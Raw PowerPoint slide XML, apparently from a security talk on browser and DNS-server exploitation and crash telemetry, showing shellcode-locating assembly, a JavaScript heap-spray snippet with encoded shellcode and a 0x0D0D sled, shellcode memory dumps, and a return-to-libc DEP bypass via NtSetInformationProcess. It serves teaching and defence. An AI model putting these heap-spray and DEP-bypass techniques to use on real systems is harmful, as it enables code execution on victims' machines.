            </a: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esi,dword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[esi+ebx+78h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> add    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi,ebx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mov</a:t>
            </a:r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edi,dword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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [esi+20h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0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6550224"/>
            <a:ext cx="6324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http://www.hick.org/code/skape/papers/win32-shellcode.pdf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62800" y="1094125"/>
            <a:ext cx="1828800" cy="1981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_PEB_LDR_DATA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1932325"/>
            <a:ext cx="18288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0x1C: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>InInitialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OrderModuleList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3657600" y="1170325"/>
            <a:ext cx="4572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29400" y="1170325"/>
            <a:ext cx="4572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67800" y="3303925"/>
            <a:ext cx="1371600" cy="609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NTDLL.DLL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67800" y="4065925"/>
            <a:ext cx="1371600" cy="609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KERNEL32.DLL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67800" y="4827925"/>
            <a:ext cx="1371600" cy="609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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Arc 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077200" y="2008525"/>
            <a:ext cx="1981200" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16163432"/>
              <a:gd name="adj2" fmla="val 58365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705600" y="914400"/>
            <a:ext cx="3657600" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -134176"/>
              <a:gd name="adj2" fmla="val 10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447800"/>
            <a:ext cx="3048000" cy="304800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3286" y="1524000"/>
            <a:ext cx="8273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5562600" y="1676401"/>
            <a:ext cx="1676400" cy="5667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9600" y="106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2054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05200"/>
            <a:ext cx="990600" cy="838200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3048000" y="4038600"/>
            <a:ext cx="9906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Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1028" idx="1"/>
            <a:endCxn id="23" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4038600" y="2113025"/>
            <a:ext cx="3048000" cy="2077975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 r="17842"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1836822" y="6051885"/>
            <a:ext cx="433537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981200" y="0"/>
            <a:ext cx="7543800" cy="1417638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Heapspray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2400" y="1600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shellcode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242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1371599"/>
            <a:ext cx="438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66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7086600" y="1904999"/>
            <a:ext cx="1676400" cy="416052"/>
            <a:chOff x="5562600" y="1600200"/>
            <a:chExt cx="1676400" cy="416052"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943600" y="16764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attack script</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1028" name="Picture 4" descr="C:\Users\johnla\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OIODY68J\MCj02932160000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62600" y="1600200"/>
              <a:ext cx="420521" cy="41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1" name="Explosion 1 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="38862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65718E-6 L -0.24896 0.119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01411 L -0.31667 0.302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1.47814E-6 C -0.0033 -0.08883 -0.01146 -0.17742 0.01458 -0.20264 C 0.0408 -0.22762 0.10156 -0.18922 0.1625 -0.15082 " pathEditMode="relative" rAng="0" ptsTypes="aaA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1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5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1" grpId="0" animBg="1"/>
      <p:bldP spid="71" grpId="1" animBg="1"/>
      <p:bldP spid="71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6705600" y="914400"/>
            <a:ext cx="3657600" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -134176"/>
              <a:gd name="adj2" fmla="val 10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  <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="39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1447800"/>
            <a:ext cx="3048000" cy="304800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286" y="1524000"/>
            <a:ext cx="8273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5562600" y="1676401"/>
            <a:ext cx="1676400" cy="56673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9600" y="1066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2054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05200"/>
            <a:ext cx="990600" cy="838200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3048000" y="4038600"/>
            <a:ext cx="9906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Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1028" idx="1"/>
            <a:endCxn id="23" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4038600" y="2113025"/>
            <a:ext cx="3048000" cy="2077975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77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7543800" y="2438400"/>
            <a:ext cx="1600200" cy="381000"/>
            <a:chOff x="6019800" y="2438400"/>
            <a:chExt cx="1600200" cy="38100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19800" y="2438400"/>
              <a:ext cx="457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477000" y="2514599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Evil.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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/>
          <a:srcRect r="17842"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1836822" y="6051885"/>
            <a:ext cx="433537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981200" y="0"/>
            <a:ext cx="7543800" cy="1417638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Heapspray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72400" y="1600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Heapspray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31242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42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242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242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242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6576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76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576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576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576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910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910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1910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10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910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244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7244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244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2578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2578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578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2578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578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39000" y="1371599"/>
            <a:ext cx="438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66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7086600" y="1904999"/>
            <a:ext cx="1676400" cy="416052"/>
            <a:chOff x="5562600" y="1600200"/>
            <a:chExt cx="1676400" cy="416052"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943600" y="1676400"/>
              <a:ext cx="1295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Attack script</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1028" name="Picture 4" descr="C:\Users\johnla\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OIODY68J\MCj02932160000[1].wm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62600" y="1600200"/>
              <a:ext cx="420521" cy="41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1" name="Explosion 1 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="38862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800600" y="2743201"/>
            <a:ext cx="2667000" cy="213360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 flipV="1">
            <a:off x="4419600" y="2590800"/>
            <a:ext cx="2971800" cy="76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32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="4191000"/>
            <a:ext cx="35814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75% of IE Exploits use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400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Heapspray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24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65718E-6 L -0.24896 0.119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01411 L -0.31667 0.3028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44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9.46102E-7 C -0.00574 -0.1152 -0.01147 -0.23017 0.00676 -0.26278 C 0.02499 -0.2954 0.06718 -0.24543 0.10954 -0.19547 " pathEditMode="relative" ptsTypes="aaA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68563E-6 L -0.42083 0.3719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1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1" grpId="0" animBg="1"/>
      <p:bldP spid="7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 = "8afe%uef0e%ue0ce%u3660%u2f1a";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z2 = "%u56ff%u510c%u8b56%u3c75%u748b%u782e%u";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z3 = "0%u8300%u20ec%udc8b%u206a%uff53%u0456";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z4 = "%u1c70%u8bad%u0868%uf78b%u0";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z5 = "0%ua164%u0030%u0000%u408b%u8b0c";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z6 = "%u04c7%u5c03%u2e61%uc765%u0";</a:t>
            </a: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z7 = "%u8b5e%u245e%udd03%u8b66%";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shellcode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unescape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("%u4343"+"%u4343"+"%u4343" + "%ua3e9%u0000%u5f0"+ z5 + z4 + "46a%ue859%u0043%u0000" +"%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516" +"%u2ee8%u000" + z3 +z6 + "344%u7804%u0065%u3300“ +"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856" +z2 + "f503%u8b56" +"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be" +"%ud63a%u0874%ucbc1%u" ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/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skipper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unescape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("%u0D0D%u0D0D");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while (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skipper.length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&lt;20+shellcode.length)  {  skipper+=skipper; }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/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skipper1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skipper.substring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(0, 20+shellcode.length);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skipper2 =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skipper.substring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(0, skipper.length-20-shellcode.length);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/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while(skipper2.length&lt;(0x40000-20-shellcode.length)) {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	skipper2 += skipper2;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	skipper2 += skipper1; //skipper2 = skipper2+skipper2+skipper1;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/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context = new Array();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ii=-1;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while(++ii&lt;414)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{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	context[ii] = skipper2 + shellcode;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/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1" y="2362201"/>
            <a:ext cx="3005951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Build up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nopsled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of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/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or eax,0D0D0D0Dh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rot="10800000" flipV="1">
            <a:off x="5334000" y="2870032"/>
            <a:ext cx="1752600" cy="558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10400" y="5791200"/>
            <a:ext cx="31242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Then copy it multiple times onto the heap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rot="10800000" flipV="1">
            <a:off x="5943600" y="6145143"/>
            <a:ext cx="1066800" cy="103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91400" y="304800"/>
            <a:ext cx="258275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/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Shellcode payload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rot="10800000" flipV="1">
            <a:off x="6477000" y="504855"/>
            <a:ext cx="914400" cy="2571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 flipV="1">
            <a:off x="6553203" y="504855"/>
            <a:ext cx="838199" cy="1476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43600" y="5105400"/>
            <a:ext cx="3124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0"/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Alloc</a:t>
            </a:r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array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3886200" y="5305455"/>
            <a:ext cx="2057400" cy="1809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1"/>
            <a:ext cx="52959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 r="4943"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="2438401"/>
            <a:ext cx="8763000" cy="410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228601"/>
            <a:ext cx="401955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6057900" y="1981200"/>
            <a:ext cx="3733800" cy="45720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362201"/>
            <a:ext cx="4038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DEP is on by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:ln w="1143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default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:ln w="11430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for DNS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40202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6858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0138f724  c3611c24 8b64db31 408b3043 1c708b0c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0138f734  08408bad 4e8e685e ff50ec0e 665366d6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0138f744  68323368 5f327377 68d0ff54 3bfcedcb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0138f754  5fd6ff50 8166e589 550208ed d0ff026a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0138f764  f509d968 d6ff57ad 53535353 43534353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0138f774  66d0ff53 664c0468 95e18953 701aa468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0138f784  d6ff57c7 5551106a a468d0ff 57e92ead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0138f794  5553d6ff e568d0ff 57498649 5450d6ff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0138f7a4  d0ff5554 79e76893 ff5779c6 d0ff55d6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0138f7b4  66646a66 896d6368 59506ae5 e789cc29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0138f7c4  e289446a aaf3c031 fe2d42fe 8d932c42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0138f7d4  abab387a fe7268ab 75ff16b3 5bd6ff44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0138f7e4  51515257 51016a51 ff515551 d9ad68d0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0138f7f4  ff53ce05 ffff6ad6 8bd0ff37 c483fc57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0138f804  52d6ff64 ef68d0ff 5360e0ce d0ffd6ff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0138f814  1000ec81 b8e90000 5afffffe 5a454e4f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0138f824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0138f834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0138f844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0138fd44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7c951e58 08048378 7ffc37b6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0138fd54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ffffffff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00000022 71a55000 00000004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0138fd64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ceebceeb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0138fd74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0138fd84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0138fd94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71a52020 76e9d768 15555555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257800"/>
            <a:ext cx="472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495800"/>
            <a:ext cx="12954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3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600200" y="3886200"/>
            <a:ext cx="8915400" cy="2895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1" descr="XP icon user accou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449" y="4011811"/>
            <a:ext cx="390723" cy="3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1" y="1524001"/>
            <a:ext cx="212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Watson Servers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1" y="4850011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Victim PC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Agent built into Windows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Victim sends crash report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43800" y="1371600"/>
            <a:ext cx="838200" cy="990600"/>
            <a:chOff x="4857" y="1445"/>
            <a:chExt cx="756" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 19" descr="Serv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7" y="1445"/>
              <a:ext cx="454" cy="670"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic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079" y="1639"/>
              <a:ext cx="534" cy="670"/>
              <a:chOff x="4888" y="1437"/>
              <a:chExt cx="534" cy="670"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Picture 21" descr="Serv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88" y="1437"/>
                <a:ext cx="454" cy="670"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="Picture 22" descr="Database blu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04" y="1800"/>
                <a:ext cx="218" cy="26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78448" y="4088011"/>
            <a:ext cx="914400" cy="685800"/>
            <a:chOff x="2170" y="3308"/>
            <a:chExt cx="1060" cy="674"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Picture 15" descr="Serv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2599" y="3308"/>
              <a:ext cx="327" cy="482"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 16" descr="laptop notebook portable Compute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80" y="3556"/>
              <a:ext cx="450" cy="426"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 17" descr="PC with flat pane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70" y="3433"/>
              <a:ext cx="533" cy="534"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 14" descr="3-01545_attac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1848" y="4093926"/>
            <a:ext cx="488552" cy="4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868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crashes feed Telemetry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 58"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8686800" y="990600"/>
            <a:ext cx="1828800" cy="1371600"/>
            <a:chOff x="6781800" y="4648200"/>
            <a:chExt cx="1828800" cy="1371600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781800" y="4953000"/>
              <a:ext cx="18288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81800" y="4648200"/>
              <a:ext cx="118994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/>
                <a:t>iexplore.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54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25000" y="1524000"/>
            <a:ext cx="363538" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55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906000" y="1371600"/>
            <a:ext cx="363538" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56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906000" y="1752600"/>
            <a:ext cx="363538" cy="3810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8991600" y="2362201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exploit code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hijacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Picture 5" descr="C:\Users\johnla\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TXAQIM4G\MPj03961210000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63000" y="1371600"/>
            <a:ext cx="609600" cy="917986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Picture 2" descr="C:\Users\johnla\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OIODY68J\MCj02932160000[1]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15401" y="1371600"/>
            <a:ext cx="462111" cy="45720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pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Bent Arrow 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6835170" y="3634770"/>
            <a:ext cx="807660" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="bent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ent Arrow 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4838700" y="952500"/>
            <a:ext cx="2286000" cy="5257800"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 18478"/>
              <a:gd name="adj3" fmla="val 22878"/>
              <a:gd name="adj4" fmla="val 43750"/>
            </a:avLst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Internet cloud we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91320" y="3124201"/>
            <a:ext cx="1776480" cy="767915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic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848600" y="5288340"/>
            <a:ext cx="838200" cy="990600"/>
            <a:chOff x="4857" y="1445"/>
            <a:chExt cx="756" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="68" name="Picture 19" descr="Serv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7" y="1445"/>
              <a:ext cx="454" cy="670"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic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5079" y="1639"/>
              <a:ext cx="534" cy="670"/>
              <a:chOff x="4888" y="1437"/>
              <a:chExt cx="534" cy="670"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="70" name="Picture 21" descr="Serv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88" y="1437"/>
                <a:ext cx="454" cy="670"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="71" name="Picture 22" descr="Database blu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04" y="1800"/>
                <a:ext cx="218" cy="26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3" name="Rectangle 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458201" y="4983540"/>
            <a:ext cx="20619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Company.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Corporate Error Reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59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4038600"/>
            <a:ext cx="1600200" cy="1076984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Picture 4" descr="MPj03999810000[1]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24000" y="1524000"/>
            <a:ext cx="1981200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Picture 5" descr="Funny Guy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362200"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Up Arrow 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="3200400"/>
            <a:ext cx="381000" cy="685800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3.33333E-6 L 0.3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9583 -0.00069 C 0.30434 -0.0081 0.3151 -0.00972 0.325 -0.0118 C 0.34219 -0.01574 0.35938 -0.01967 0.37639 -0.02477 C 0.3849 -0.02731 0.39306 -0.02986 0.39861 -0.03958 C 0.40069 -0.04305 0.40226 -0.04699 0.40417 -0.05069 C 0.40503 -0.05255 0.40694 -0.05625 0.40694 -0.05602 C 0.40885 -0.06667 0.41059 -0.07731 0.4125 -0.08773 C 0.41319 -0.09143 0.41528 -0.09884 0.41528 -0.09861 C 0.41771 -0.12222 0.41927 -0.1463 0.42361 -0.16921 C 0.42552 -0.19467 0.42726 -0.22454 0.43333 -0.24884 C 0.43472 -0.26458 0.43698 -0.27963 0.43889 -0.29514 C 0.43837 -0.30694 0.43837 -0.31852 0.4375 -0.33032 C 0.43715 -0.33542 0.43559 -0.34028 0.43472 -0.34514 C 0.43438 -0.34699 0.43333 -0.35069 0.43333 -0.35046 " pathEditMode="relative" rAng="0" ptsTypes="fffffffffffff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1300878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CALL STACK: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dns!extractQuotedChar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dns!Name_ConvertFileNameToCountName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dns!Lookup_ZoneTreeNodeFromDottedName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0" y="2421553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dns!Zone_FindZoneByName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dns!RpcUtil_FindZone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dns!R_DnssrvQuery2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dns!R_DnssrvQuery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rpcrt4!NdrStubCall2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rpcrt4!NdrServerCall2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rpcrt4!DispatchToStubInCNoAvrf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2443878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shellcode payload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ntdll!NtSetInformationProcess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ceebceeb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endParaRPr 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1529477"/>
            <a:ext cx="243840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 rtl="0"/>
            <a:r>
              <a:rPr lang="en-US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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Buffer Overrun</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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0" y="3815477"/>
            <a:ext cx="243840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 rtl="0"/>
            <a:r>
              <a:rPr lang="en-US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DEP is turned off</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Curved Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="17580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2057400" y="20628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5181600" y="1681877"/>
            <a:ext cx="2057400" cy="1524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905000" y="2367677"/>
            <a:ext cx="381000" cy="16764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libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to turn off DEP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18910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22" grpId="0" animBg="1"/>
      <p:bldP spid="24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048000" y="1752601"/>
            <a:ext cx="632460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7c951e58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08048378 7ffc37b6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ffffffff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00000022 71a55000 00000004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NtSetInformationProcess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(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	HANDLE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ProcessHandle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	PROCESSINFOCLASS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ProcessInformationClass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 	PVOID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   ULONG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ProcessInformationLength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)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libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to turn off DEP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1752601"/>
            <a:ext cx="632460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7c951e58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08048378 7ffc37b6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ffffffff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00000022 71a55000 00000004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...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/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NtSetInformationProcess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(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	HANDLE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ProcessHandle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0xffffffff ==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GetCurrentProcess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()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	PROCESSINFOCLASS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ProcessInformationClass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	  0x22 ==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ProcessExecuteFlags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 	PVOID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,</a:t>
            </a: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		   71a55000  ==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NxOff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settings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   ULONG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ProcessInformationLength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		        0x4 ==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DWORD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010694" y="3161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772694" y="3467100"/>
            <a:ext cx="17518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687094" y="3694906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715794" y="4037806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6000" y="1300878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CALL STACK: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dns!extractQuotedChar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dns!Name_ConvertFileNameToCountName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dns!Lookup_ZoneTreeNodeFromDottedName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2443878"/>
            <a:ext cx="701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shellcode payload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(jump backwards)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(jump backwards)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(jump backwards)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ecebeeeb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(jump backwards) </a:t>
            </a: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ntdll!NtSetInformationProcess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ceebceeb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(jump backwards)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0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  <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:endParaRPr lang="en-US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0" y="2443877"/>
            <a:ext cx="2438400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 rtl="0"/>
            <a:r>
              <a:rPr lang="en-US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/>
              </a:rPr>
              <a:t>Payload runs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6096000" y="2520077"/>
            <a:ext cx="1447800" cy="1524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Curved Right Arrow 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2057400" y="3739277"/>
            <a:ext cx="228600" cy="5334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Curved Right Arrow 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2057400" y="34344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Curved Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
